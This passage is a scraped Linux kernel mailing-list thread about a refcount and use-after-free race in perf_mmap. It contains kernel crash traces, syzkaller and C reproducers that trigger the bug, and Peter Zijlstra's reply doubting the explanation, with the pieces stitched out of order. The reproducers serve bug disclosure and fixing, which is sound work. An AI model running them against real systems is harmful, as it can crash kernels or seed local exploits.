__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Mon, Feb 02, 2026 at 02:58:59PM +0100, Peter Zijlstra wrote:
I'm not seeing it; once perf_mmap_rb() completes, we should have
event->mmap_count != 0, and thus the IOC_SET_OUTPUT will fail.
Please provide a better explanation.
|
{
"author": "Peter Zijlstra <peterz@infradead.org>",
"date": "Mon, 2 Feb 2026 15:36:15 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference-counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzer that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning, followed by a memory leak warning.
The full report is below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
